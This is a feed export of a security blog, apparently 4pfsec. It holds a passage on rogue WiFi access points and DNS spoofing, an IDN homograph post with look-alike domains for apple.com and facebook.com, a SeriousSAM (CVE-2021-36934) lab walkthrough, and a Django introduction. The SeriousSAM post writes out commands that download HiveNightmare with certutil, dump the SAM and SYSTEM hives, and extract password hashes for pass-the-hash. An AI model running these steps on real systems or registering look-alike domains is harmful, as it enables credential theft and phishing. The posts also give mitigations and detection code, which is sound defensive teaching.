<p>Add a custom host entry to redirect hosts.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983444733/32089b76-cf30-4309-805f-fe1f0e3e7d55.png" alt="Wireless Hacking with the Wifi Pineapple 🍍" /></p>
<p>I'll be adding a fake entry for <code>example.com</code>. <code>example.com</code> is an actual site that people can access on the web. The real site looks like the following:</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983446662/fbd13889-e0b1-4737-98c3-478a9d101ff0.png" alt="Wireless Hacking with the Wifi Pineapple 🍍" /></p>
<p>Now that we have pointed it to a different IP address containing our "evil portal", let's see what happens to the clients connected to our rogue network.</p>
<h3 id="heading-live-dns-attack">Live DNS Attack</h3>
<p>Here we can see one of the rogue network's clients navigating to <code>example.com</code>, but what it sees is totally different from the actual website. This shows that an attacker in a man-in-the-middle position can easily reply falsely to your DNS queries, which is highly likely to end up as a phishing attack.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983447813/a90a3eb9-30e5-4ebd-9c7f-f3882f28e423.gif" alt="Wireless Hacking with the Wifi Pineapple 🍍" /></p>
<hr />
<h1 id="heading-pineap">PineAP</h1>
<p>This section contains information on PineAP and how it can be used.</p>
<h1 id="heading-background">Background</h1>
<p>PineAP is a powerful, modular rogue access point suite that helps WiFi auditors collect clients by imitating Preferred Networks. Leveraging PineAP, we are able to see what SSIDs devices are trying to look for. Using that information and PineAP's features, we are able to advertise ourselves as that SSID which the device is looking for.</p>
<h2 id="heading-example">Example</h2>
<p>Let's say you were authenticated to your home network named <code>4pfHome</code>. Your phone will then look for that same SSID when you're outside with your WiFi on. PineAP sees this and advertises itself as <code>4pfHome</code> to your device. If your device connects, you become one of the Wifi 🍍's many clients, and that's not good. Let's take a look at how it's done!</p>
<h1 id="heading-live-attack">Live Attack</h1>
<p>Prior to launching the attack, the PineAP first has to be set up to listen.</p>
<h2 id="heading-pineap-setup">PineAP Setup</h2>
<p>Enable the following options to be able to capture and rebroadcast SSIDs:</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983450296/43cb8031-b14e-4bfc-8ccd-a3e62dd0f471.png" alt="Wireless Hacking with the Wifi Pineapple 🍍" /></p>
<h2 id="heading-broadcast-attack">Broadcast Attack</h2>
<p>After letting PineAP do its thing for a while, we are able to see a couple of SSIDs in the <code>SSID Pool</code>.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983452079/7b510b25-25de-4c39-93a6-2b688ca69af5.png" alt="Wireless Hacking with the Wifi Pineapple 🍍" /></p>
<p>Now on my devices, I am able to see these SSIDs being broadcast, unprotected (as shown below).</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983453780/cb394e7a-d7c6-43f6-94fb-b884afad2aae.png" alt="Wireless Hacking with the Wifi Pineapple 🍍" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983455409/3c1307a5-de34-46c0-9682-f36047d42b5c.png" alt="Wireless Hacking with the Wifi Pineapple 🍍" /></p>
<p>Now once our "target" connects to our network, we own it :) (kind of)</p>
<h2 id="heading-client-connect-back">Client Connect back</h2>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983456802/983eaf1e-904e-4f97-a59f-03959557cbfc.png" alt="Wireless Hacking with the Wifi Pineapple 🍍" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983458950/2cbcea38-d4b6-4e58-9885-114cde790697.png" alt="Wireless Hacking with the Wifi Pineapple 🍍" /></p>
<h2 id="heading-clients">Clients</h2>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983460540/91aaae36-9a7f-4dd1-81ff-01899fe166e0.png" alt="Wireless Hacking with the Wifi Pineapple 🍍" /></p>
<p>We can see that both the devices are connected to the Wifi 🍍 but they are connected under 2 different SSIDs. My laptop thinks it is connected to <code>AndroidAP68A2</code> and my phone thinks it is connected to <code>Linksys12765_5GHz</code>.</p>
<p>The connected devices won't realize a thing as the Wifi 🍍 is connected to the internet and acts how any other router would.</p>
<p>Now that we have both devices connected to our bogus network, we can use <strong>Modules</strong> (which will be covered in the next section) to perform various attacks.</p>
<p>This is how we can make use of PineAP to trick users to connect to us.</p>
<p>    From my testing, I wasn't able to get the devices to connect to the endpoints automatically. Thus, this attack still depends on the user to make the final decision to connect.</p>
<hr />
<p>That was an awesome way to get introduced to wireless hacking! I wish to explore more manual options in the near future 🔥!</p>
]]></content:encoded></item><item><title><![CDATA[IDN homograph attack - Domain Spoofing]]></title><description><![CDATA[I have always wondered how malicious attackers register domains that look exactly like the original but have a slight change in the characters used. Mostly Unicode characters. I recently sank some time into figuring out how this attack works with the...]]></description><link>https://4pfsec.com/idn-homograph-attack-domain-spoofing</link><guid isPermaLink="true">https://4pfsec.com/idn-homograph-attack-domain-spoofing</guid><dc:creator><![CDATA[Nee]]></dc:creator><pubDate>Fri, 23 Jul 2021 16:28:51 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983479121/fc02e7a5-4822-4cf2-9649-68f9e32321f2.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983466959/1f85f3b4-0467-4102-8bd1-9106ae3c0755.jpeg" alt="IDN homograph attack - Domain Spoofing" /></p>
<p>I have always wondered how malicious attackers register domains that look exactly like the original but have a slight change in the characters used. Mostly Unicode characters. I recently sank some time into figuring out how this attack works with the various characters. I eventually succeeded in my attempts.</p>
<p>I now own <a target="_blank" href="http://xn--pple-pzb.com/">ȧpple.com</a> and <a target="_blank" href="http://xn--acebook-js3c.com/">ḟacebook.com</a>. If you were to open the links in Safari or Firefox, they would appear as shown above. However, if you were to open them in a Chromium-based browser, you would see the ASCII version. Here's what happens in the background and how I did it.</p>
<h1 id="heading-background">Background</h1>
<p>A hostile actor can fool users about which remote system they are connecting to via an internationalized domain name (IDN) homograph attack. There are a ton of character look-alikes that can be used to perform such attacks. For example, the "a" in <a target="_blank" href="http://apple.com">apple.com</a> can be replaced with the Cyrillic character "а", or even with the Latin Extended Additional character "ȧ", which is what I've done in my POC domains. If you're interested, check <a target="_blank" href="https://en.wiktionary.org/wiki/Appendix:Unicode/Latin_Extended_Additional">this</a> out!</p>
<h2 id="heading-punycode">Punycode</h2>
<p>You may wonder how someone is able to register a domain with Unicode characters. That's where Punycode comes in! If you closely inspect the URL in most Chromium-based browsers, you'll notice that I actually registered <code>xn--acebook-js3c.com</code> and <code>xn--pple-pzb.com</code>.</p>
<p>The characters <code>ȧ</code> and <code>ḟ</code> are Unicode characters. Punycode is an encoding that represents Unicode strings using only the ASCII character set, so that they can be used in Internet hostnames. This is what allows someone to register a domain containing Unicode characters.</p>
<h1 id="heading-in-action">In action</h1>
<p>Let's take a look at how various browsers process the Punycode (by default).</p>
<h2 id="heading-firefox">Firefox</h2>
<iframe width="200" height="113" src="https://www.youtube.com/embed/RHkflnP7Alg?feature=oembed"></iframe>

<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983468341/6f6bd4b3-5464-470c-be1e-16b8b6dd1c9f.png" alt="IDN homograph attack - Domain Spoofing" /></p>
<h2 id="heading-safari">Safari</h2>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983469934/0b5513a2-c412-4e49-9bdf-1cd15f4ad934.png" alt="IDN homograph attack - Domain Spoofing" /></p>
<h2 id="heading-bravechrome">Brave/Chrome</h2>
<iframe width="200" height="113" src="https://www.youtube.com/embed/eu9nR4Y0hDk?feature=oembed"></iframe>

<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983471986/321e04ec-409f-4efe-9d72-626d7b1c85e6.png" alt="IDN homograph attack - Domain Spoofing" /></p>
<h1 id="heading-conclusion">Conclusion</h1>
<p>Most Chromium-based browsers seem to have fixed this "issue" by displaying the ASCII version and not rendering the Punycode. However, Firefox and Safari don't seem to do this by default, at least from my testing. There might be more browsers I'm unaware of that do this.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983474125/63a93c00-9cf9-4302-b993-343eb133859c.png" alt="IDN homograph attack - Domain Spoofing" /></p>
<h1 id="heading-impact">Impact</h1>
<p>If you're reading this, you will definitely be able to pick out the difference and catch this. It's the general public we have to be worried about. This attack creates a lot of possibilities for phishing. From a distance, people might not be able to tell the difference and end up giving away their credentials.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983475082/6e9b2a98-e091-4cad-8325-975e0c416123.png" alt="IDN homograph attack - Domain Spoofing" /></p>
<h1 id="heading-fix">Fix</h1>
<p>The most obvious answer would be to use a password manager. Password managers associate the domains with your credentials. This stops a look-alike domain from stealing your credentials!</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983476720/adfeaa22-1745-476f-9a23-26a1d0086058.png" alt="IDN homograph attack - Domain Spoofing" /></p>
<p>The temporary solution for Firefox users would be to head to <code>about:config</code> and set <code>network.IDN_show_punycode</code> to <code>true</code>. This ensures that Firefox shows the same URL as Chromium-based browsers!</p>
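<p>As an added example (not code from the original post), here is a Python decoder for the Punycode labels described in the Punycode section above, together with the mark-stripping check a defender can use to flag that <code>xn--pple-pzb.com</code> is a look-alike of <code>apple.com</code>. The watch list of trusted domains is a constructed assumption; a real deployment would carry its own brands.</p>

```python
import unicodedata
from typing import Optional, Set

# Parameters from RFC 3492 section 5.
BASE, TMIN, TMAX, SKEW, DAMP = 36, 1, 26, 38, 700
INITIAL_BIAS, INITIAL_N = 72, 128


def _adapt(delta: int, num_points: int, first_time: bool) -> int:
    """Bias adaptation function (RFC 3492 section 6.1)."""
    delta = delta // DAMP if first_time else delta // 2
    delta += delta // num_points
    k = 0
    while delta > ((BASE - TMIN) * TMAX) // 2:
        delta //= BASE - TMIN
        k += BASE
    return k + (BASE - TMIN + 1) * delta // (delta + SKEW)


def _digit_value(ch: str) -> int:
    """Punycode digits: a-z map to 0-25, 0-9 map to 26-35."""
    if "a" <= ch <= "z":
        return ord(ch) - ord("a")
    if "0" <= ch <= "9":
        return ord(ch) - ord("0") + 26
    raise ValueError(f"invalid Punycode digit {ch!r}")


def punycode_decode(encoded: str) -> str:
    """Decode the part after 'xn--' of one label (RFC 3492 section 6.2)."""
    delim = encoded.rfind("-")
    if delim > 0:
        # Everything before the last '-' is plain ASCII copied through as-is.
        output, rest = list(encoded[:delim]), encoded[delim + 1:]
    else:
        output, rest = [], encoded
    n, i, bias, pos = INITIAL_N, 0, INITIAL_BIAS, 0
    while pos < len(rest):
        old_i, w, k = i, 1, BASE
        while True:
            if pos >= len(rest):
                raise ValueError("truncated Punycode input")
            digit = _digit_value(rest[pos])
            pos += 1
            i += digit * w  # generalised variable-length integer
            t = TMIN if k <= bias else TMAX if k >= bias + TMAX else k - bias
            if digit < t:
                break
            w *= BASE - t
            k += BASE
        bias = _adapt(i - old_i, len(output) + 1, old_i == 0)
        n += i // (len(output) + 1)
        i %= len(output) + 1
        output.insert(i, chr(n))  # the decoded code point goes at position i
        i += 1
    return "".join(output)


def decode_idn_host(host: str) -> str:
    """Turn an ACE hostname such as 'xn--pple-pzb.com' into its Unicode form."""
    labels = []
    for label in host.lower().split("."):
        labels.append(punycode_decode(label[4:]) if label.startswith("xn--") else label)
    return ".".join(labels)


def skeleton(host: str) -> str:
    """Strip combining marks so the dotted a in 'ȧpple.com' becomes a plain a.

    This only catches diacritic look-alikes; a Cyrillic 'а' has no decomposition
    to Latin 'a' and needs the Unicode TR39 confusables table instead.
    """
    decomposed = unicodedata.normalize("NFKD", host)
    return "".join(c for c in decomposed if unicodedata.category(c) != "Mn")


def lookalike_of(host: str, trusted: Set[str]) -> Optional[str]:
    """Return the trusted domain this host impersonates, or None if it is clean."""
    unicode_host = decode_idn_host(host)
    if unicode_host in trusted:
        return None  # the genuine domain itself
    sk = skeleton(unicode_host)
    return sk if sk in trusted else None


if __name__ == "__main__":
    # Constructed watch list (assumption): the brands a defender cares about.
    WATCH_LIST = {"apple.com", "facebook.com"}
    for ace in ("xn--pple-pzb.com", "xn--acebook-js3c.com", "apple.com"):
        print(ace, "->", decode_idn_host(ace), "impersonates", lookalike_of(ace, WATCH_LIST))
```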
<h1 id="heading-poc">POC</h1>
<p>Access these links on Firefox/Safari to see the effect!</p>
<p><a target="_blank" href="http://xn--pple-pzb.com/">http://ȧpple.com/</a></p>
<p><a target="_blank" href="http://xn--acebook-js3c.com/">http://ḟacebook.com/</a></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983477968/e4caf910-005c-4ddd-93c6-40724bf26c60.png" alt="IDN homograph attack - Domain Spoofing" /></p>
<h2 id="heading-for-those-interested">For those interested</h2>
<hr />
<p>    [Steps to reproduce]</p>
<ul>
<li>Purchase a domain name, specifically the ASCII version of "ȧpple.com", which turns out to be "xn--pple-pzb.com".</li>
<li>Set up DNS records and point them to a server hosting a static site.</li>
<li>Launch the latest version of Firefox and browse to "xn--pple-pzb.com".</li>
</ul>
<hr />
<p>    [Actual Results]</p>
<ul>
<li>Firefox processes "xn--pple-pzb.com" in the address bar and displays the Unicode version, "ȧpple.com" in the address bar to the end-user.</li>
</ul>
]]></content:encoded></item><item><title><![CDATA[SeriousSAM (CVE-2021–36934)]]></title><description><![CDATA[SeriousSAM is a CVE which allows non privileged users to read registry and sensitive data. Users are then able to elevate their privileges using the obtained data. This vulnerability has exists in windows based machines for the longest time. It was j...]]></description><link>https://4pfsec.com/serioussam-cve-202136934</link><guid isPermaLink="true">https://4pfsec.com/serioussam-cve-202136934</guid><dc:creator><![CDATA[Nee]]></dc:creator><pubDate>Fri, 23 Jul 2021 14:31:09 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983496834/37b8326a-36b4-43cc-8a03-cb92857d44e3.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983484621/5dc9de47-b7d3-48bc-add2-e82ae7929178.jpeg" alt="SeriousSAM (CVE-2021–36934)" /></p>
<p>SeriousSAM is a CVE that allows non-privileged users to read the registry hives and other sensitive data. Users are then able to elevate their privileges using the obtained data. This vulnerability has existed in Windows-based machines for a long time; it was just never uncovered until the 20th of July 2021. I'll be exploiting the Elevation of Privilege Vulnerability in my own lab environment!</p>
<h1 id="heading-executive-summary">Executive Summary</h1>
<blockquote>
<p>An elevation of privilege vulnerability exists because of overly permissive Access Control Lists (ACLs) on multiple system files, including the Security Accounts Manager (SAM) database. An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. An attacker must have the ability to execute code on a victim system to exploit this vulnerability.</p>
</blockquote>
<p><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934">Link</a> to Microsoft's post.</p>
<h1 id="heading-prerequisites">Prerequisites</h1>
<p>There are certain prerequisites that have to be met in order to exploit this vulnerability. It relies on the Volume Shadow Copy Service (VSS), AKA System Restore Points, together with the insecure SAM file permissions.</p>
<h2 id="heading-system-protection">System Protection</h2>
<p>System Protection has to be enabled for at least the C: drive. This has to be done by an administrator of the machine.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983485734/dc2c5f6a-f3a3-4d05-b4f2-08eb43d25ab1.png" alt="SeriousSAM (CVE-2021–36934)" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983487054/fdf08179-5fdb-4fb7-84e0-d9f9c13e561e.png" alt="SeriousSAM (CVE-2021–36934)" /></p>
<h2 id="heading-restore-point">Restore Point</h2>
<p>A restore point has to exist on the target machine. This has to be done by an administrator of the machine.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983488165/06f1506a-a256-43c9-bc2b-14b21105ba2c.png" alt="SeriousSAM (CVE-2021–36934)" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983489476/e54525fd-6af5-42fd-b4ea-bdf5f9437564.png" alt="SeriousSAM (CVE-2021–36934)" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983491017/ec26a5bf-b16b-4ed4-8523-f75215875d65.png" alt="SeriousSAM (CVE-2021–36934)" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983491953/fcc89096-5163-4899-a66a-1d7e36c1200c.png" alt="SeriousSAM (CVE-2021–36934)" /></p>
<h1 id="heading-privilege-escalation">Privilege Escalation</h1>
<p>Now let's assume we have an initial shell on the box as a low-privilege user. This is how we would go about getting those hashes, which we can then pass around 😉.</p>
<h2 id="heading-transfer-malicious-executable">Transfer Malicious Executable</h2>
<p>I'll be utilizing <a target="_blank" href="https://github.com/GossiTheDog/HiveNightmare.git">this</a> repository by <a target="_blank" href="https://github.com/GossiTheDog">Kevin Beaumont</a> to exploit this vulnerability. The latest version of the executable (as of writing this) can be downloaded from <a target="_blank" href="https://github.com/GossiTheDog/HiveNightmare/releases/download/0.5/HiveNightmare.exe">here</a>.</p>
<p>    C:\Users\user\Desktop\SeriousSAM&gt;certutil -urlcache -f https://github.com/GossiTheDog/HiveNightmare/releases/download/0.5/HiveNightmare.exe HiveNightmare.exe</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983492973/512b9bd8-c299-41c1-9369-de05d7e9462f.png" alt="SeriousSAM (CVE-2021–36934)" /></p>
<h2 id="heading-run-exploit">Run exploit</h2>
<p>Running the executable successfully dumps out the SAM, SECURITY and SYSTEM files.</p>
<p>    C:\Users\user\Desktop\SeriousSAM&gt;HiveNightmare.exe</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983494546/11966d98-c3a7-4e3c-a426-b626e036dfff.png" alt="SeriousSAM (CVE-2021–36934)" /></p>
<h2 id="heading-dumping-hashes">Dumping Hashes</h2>
<p>Using <a target="_blank" href="https://github.com/CiscoCXSecurity/creddump7.git">CredDump7</a> we are able to dump the user accounts' hashes for further use.</p>
<p>    ┌──(root💀4pfsec)-[~/projects/seriousSam]
    └─# /opt/creddump7/pwdump.py SYSTEM-2021-06-13 SAM-2021-06-13</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983495724/b425af62-5e9b-4f34-bbfa-7f9a5dc6a8eb.png" alt="SeriousSAM (CVE-2021–36934)" /></p>
<p>We were able to successfully dump the hashes from the target machine, which we can then use to perform a <code>Pass the Hash</code> attack with <code>psexec</code>.</p>
<h1 id="heading-workaround-temporary-patch">Workaround / Temporary Patch</h1>
<p>As published by Microsoft:</p>
<p><strong>Restrict access to the contents of %windir%\system32\config</strong></p>
<p>Command Prompt (Run as administrator): <code>icacls %windir%\system32\config\*.* /inheritance:e</code></p>
<p>Windows PowerShell (Run as administrator): <code>icacls $env:windir\system32\config\*.* /inheritance:e</code></p>
<p><strong>Delete Volume Shadow Copy Service (VSS) shadow copies</strong></p>
<ol>
<li>Delete any System Restore points and Shadow volumes that existed prior to restricting access to %windir%\system32\config.</li>
<li>Create a new System Restore point (if desired).</li>
</ol>
<p><strong>Impact of workaround:</strong> Deleting shadow copies could impact restore operations, including the ability to restore data with third-party backup applications. For more information on how to delete shadow copies, see <a target="_blank" href="https://www.notion.so/1ceaa637aaa34b58a48bbaf72a2fa9e7">KB5005357 - Delete Volume Shadow Copies</a>.</p>
<p><strong>Note</strong> You must restrict access <em>and</em> delete shadow copies to prevent exploitation of this vulnerability.</p>
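<p>Before (and after) applying the workaround it is worth confirming what the hive ACLs actually say. The Python check below is an added example, not part of Microsoft's guidance or of HiveNightmare: it parses <code>icacls</code> output for a hive file and reports whether <code>BUILTIN\Users</code>, <code>Everyone</code> or <code>Authenticated Users</code> hold read access on it, which is the condition the exploit needs. The two embedded samples are constructed to mirror the vulnerable ACL and a corrected one; the live path shells out to <code>icacls</code> and therefore only works on Windows.</p>

```python
"""Check whether the registry hives under the config directory are readable by
non-administrators, the ACL mistake HiveNightmare depends on. Added example,
not Microsoft's guidance or HiveNightmare code. It parses icacls output; the
samples below are constructed, and the live check shells out to icacls and so
only works on Windows."""
import re
import subprocess

CONFIG_DIR = r"C:\Windows\system32\config"
HIVES = ("SAM", "SECURITY", "SYSTEM")

# One ACE per icacls line: PRINCIPAL:(flag)(flag)(perm)
ACE_RE = re.compile(r"^(.+?):((?:\([^)]*\))+)$")
# Principals that should never be able to read a hive.
BROAD_PRINCIPALS = {"builtin\\users", "everyone", "nt authority\\authenticated users"}
# Any of these icacls tokens grants read access to the file contents.
READ_TOKENS = {"F", "M", "RX", "R", "GR", "GA", "RD"}


def parse_icacls(output, path):
    """Map each principal in icacls output for `path` (lower-cased) to its permission tokens."""
    perms = {}
    for raw in output.splitlines():
        line = raw.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        if line.lower().startswith(path.lower()):   # the first line carries the path
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if m is None:
            continue
        principal = m.group(1).strip().lower()
        tokens = set()
        for ace in re.findall(r"\(([^)]*)\)", m.group(2)):
            tokens.update(t.strip().upper() for t in ace.split(","))
        perms.setdefault(principal, set()).update(tokens)
    return perms


def broad_readers(perms):
    """Broad principals holding read access, sorted; an empty list means the ACL is sane."""
    return sorted(p for p, toks in perms.items() if p in BROAD_PRINCIPALS and toks & READ_TOKENS)


def check_hive(path, output=None):
    """Return the broad principals that can read `path`. Pass `output` to check
    captured icacls text offline; otherwise icacls is run (Windows only)."""
    if output is None:
        output = subprocess.run(["icacls", path], capture_output=True, text=True, check=False).stdout
    return broad_readers(parse_icacls(output, path))


# Constructed sample mirroring the vulnerable ACL: Users inherit (RX) on SAM.
VULNERABLE_SAMPLE = r"""C:\Windows\system32\config\SAM BUILTIN\Administrators:(I)(F)
                               NT AUTHORITY\SYSTEM:(I)(F)
                               BUILTIN\Users:(I)(RX)
                               APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)

Successfully processed 1 files; Failed processing 0 files
"""

# Constructed sample of a corrected ACL: administrators and SYSTEM only.
FIXED_SAMPLE = r"""C:\Windows\system32\config\SAM NT AUTHORITY\SYSTEM:(I)(F)
                               BUILTIN\Administrators:(I)(F)

Successfully processed 1 files; Failed processing 0 files
"""

if __name__ == "__main__":
    for hive in HIVES:                                 # live check, Windows only
        path = CONFIG_DIR + "\\" + hive
        readers = check_hive(path)
        print(path, "readable by " + ", ".join(readers) if readers else "OK")
```

<p>Remember that a clean ACL on the live hives is only half the story: an older shadow copy still carries the old ACL, which is why Microsoft's note above insists on deleting the shadow copies as well.</p>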
<p>There's also a bunch of updates for the various versions of windows over on <a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934">this</a> page (at the bottom).</p>
]]></content:encoded></item><item><title><![CDATA[Introduction to Django Framework]]></title><description><![CDATA[I recently picked up the basics of flask and have been wanting to learn Django. Here's my go @ it with the help of TryHackMe! Django is a high-level Python web framework that enables the rapid development of secure and maintainable websites. It allow...]]></description><link>https://4pfsec.com/introduction-to-django-framework</link><guid isPermaLink="true">https://4pfsec.com/introduction-to-django-framework</guid><dc:creator><![CDATA[Nee]]></dc:creator><pubDate>Mon, 19 Jul 2021 15:24:31 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983546872/ca152625-3aec-427e-b790-1cd7ea432c46.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983502030/4e115f95-1565-4c39-8836-2489dbee86cd.jpeg" alt="Introduction to Django Framework" /></p>
<p>I recently picked up the basics of flask and have been wanting to learn Django. Here's my go @ it with the help of <a target="_blank" href="https://tryhackme.com/room/django">TryHackMe</a>! Django is a high-level Python web framework that enables the rapid development of secure and maintainable websites. It allows you to develop websites and web applications in a matter of hours.</p>
<p>Django's template engine generates the HTML for you, so it is possible to build a site without deep knowledge of markup languages. It is also, arguably, one of the more secure web frameworks: its ORM parameterises queries and its templates escape output by default, so a correctly configured Django application strongly resists SQL injection and XSS.</p>
<p>In terms of penetration testing, it's critical to grasp the basic structure of Django-powered websites in order to spot potential flaws and developer errors.</p>
<p><a target="_blank" href="https://github.com/ItsNee/DjangoExampleTemplate.git">All Source Files</a></p>
<hr />
<h2 id="heading-getting-started">Getting Started</h2>
<p>Here's how to get started with Django on your local machine!</p>
<h3 id="heading-installing-django">Installing Django</h3>
<p>The room pins Django 2.2.12. That release line reached end of life in April 2022, so for anything beyond this lab install a supported release instead.</p>
<p>    ┌──(root💀4pfsec)-[~/boxes/thm/django]
    └─# pip3 install Django==2.2.12</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983503291/c7d1823e-a66d-4dd0-bec1-0e0adad10f52.png" alt="Introduction to Django Framework" /></p>
<h3 id="heading-creating-new-project">Creating new Project</h3>
<p>    ┌──(root💀4pfsec)-[~/boxes/thm/django]
    └─# django-admin startproject site_4pfsec</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983504427/1f14c37e-54ea-418b-b182-2a59e6912ea8.png" alt="Introduction to Django Framework" /></p>
<h3 id="heading-configure-created-project">Configure created Project</h3>
<p><code>manage.py</code> is a command-line utility that lets you interact with your Django project in various ways. It is especially handy in creating web apps, managing databases, and most importantly running the server.</p>
<p>    ┌──(root💀4pfsec)-[~/boxes/thm/django/site_4pfsec]
    └─# ls
    manage.py  site_4pfsec</p>
<p>    ┌──(root💀4pfsec)-[~/boxes/thm/django/site_4pfsec]
    └─# python3 manage.py migrate</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983505454/d7435461-eaef-4876-abea-83a17bf58b24.png" alt="Introduction to Django Framework" /></p>
<p>    ┌──(root💀4pfsec)-[~/boxes/thm/django/site_4pfsec]
    └─# ls
    db.sqlite3  manage.py  site_4pfsec</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983506608/c45f4bb0-28dd-4c15-b894-6cb61bd978d0.png" alt="Introduction to Django Framework" /></p>
<h3 id="heading-run-django-server">Run Django Server</h3>
<p>The basic syntax for using this utility is <code>python3 manage.py {command}</code></p>
<p><strong>Modify ALLOWED_HOSTS</strong></p>
<p>Edit <code>ALLOWED_HOSTS</code> on line 28 of <code>settings.py</code> and add <code>0.0.0.0</code> and <code>127.0.0.1</code>.<br /><code>~/django/site_4pfsec/site_4pfsec/settings.py</code></p>
<p>This is not the bind address (that is passed to <code>runserver</code> below). <code>ALLOWED_HOSTS</code> is the list of <code>Host</code> header values Django will serve; a request with any other value gets a <code>DisallowedHost</code> error. Outside a lab, list the real hostnames rather than a wildcard, otherwise an attacker-controlled <code>Host</code> header ends up in absolute URLs Django builds, such as password-reset links.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983507634/cbec273f-097e-4dc6-8efd-fbe8955bb3b8.png" alt="Introduction to Django Framework" /></p>
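<p>To make clear what that setting actually checks, here is a simplified re-implementation of Django's <code>ALLOWED_HOSTS</code> matching, added as an example and not Django's own code (the real check is <code>django.http.request.validate_host</code>). It follows Django's documented rules: exact match, a leading dot matches a domain and all of its subdomains, and <code>'*'</code> matches everything. The settings lists and <code>Host</code> values in it are constructed; the first list is the one from this walkthrough, and probing it with a box's network address reproduces the <code>DisallowedHost</code> mismatch you hit when you reach a lab machine by IP.</p>

```python
"""Simplified re-implementation of Django's ALLOWED_HOSTS matching (added
example, not Django's own code; the real check is
django.http.request.validate_host). Rules: exact match, a leading dot matches
the domain and its subdomains, '*' matches everything."""


def split_domain_port(http_host):
    """Separate host and port from a Host header value, the way Django does:
    a bracketed IPv6 literal keeps its brackets and is matched as a whole."""
    host = http_host.strip().lower()
    if host.endswith("]"):                    # "[::1]" with no port
        return host, ""
    domain, sep, port = host.rpartition(":")
    if not sep:                               # no port present
        return host, ""
    return domain, port


def host_allowed(http_host, allowed_hosts):
    """True if Django would serve a request carrying this Host header."""
    domain, _port = split_domain_port(http_host)
    if domain.endswith("."):                  # Django ignores one trailing dot
        domain = domain[:-1]
    for pattern in allowed_hosts:
        pattern = pattern.lower()
        if pattern == "*":
            return True                       # wildcard: any Host header is accepted
        if pattern.startswith("."):
            if domain == pattern[1:] or domain.endswith(pattern):
                return True
        elif domain == pattern:
            return True
    return False


# Constructed settings: the values from the walkthrough, a wildcard, and an explicit list.
LAB_SETTING = ["0.0.0.0", "127.0.0.1"]
WILDCARD_SETTING = ["*"]
HARDENED_SETTING = ["10.10.131.20", ".example.com"]


def disallowed_hosts(setting, host_headers):
    """Which of the given Host header values would be rejected under `setting`."""
    return [h for h in host_headers if not host_allowed(h, setting)]


if __name__ == "__main__":
    probes = ["127.0.0.1:8000", "10.10.131.20:8000", "attacker.net"]
    for name, setting in [("lab", LAB_SETTING), ("wildcard", WILDCARD_SETTING), ("hardened", HARDENED_SETTING)]:
        print(name, "rejects:", disallowed_hosts(setting, probes))
```

<p>One Django behaviour worth knowing: with <code>DEBUG = True</code> and an empty <code>ALLOWED_HOSTS</code>, Django falls back to allowing <code>localhost</code>, <code>127.0.0.1</code> and <code>[::1]</code>, which is why a fresh project works on your own machine until you point another hostname or address at it.</p>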
<p><strong>runserver</strong></p>
<p><code>runserver</code> is the <code>manage.py</code> command you will use most: it starts Django's development server. It reloads automatically when you change Python files, so you only need to restart it after adding a new app. It is a development tool only and not meant to serve a production site; for that, Django sits behind a WSGI server.</p>
<p>    ┌──(root💀4pfsec)-[~/boxes/thm/django/site_4pfsec]
    └─# python3 manage.py runserver 0.0.0.0:8000 </p>
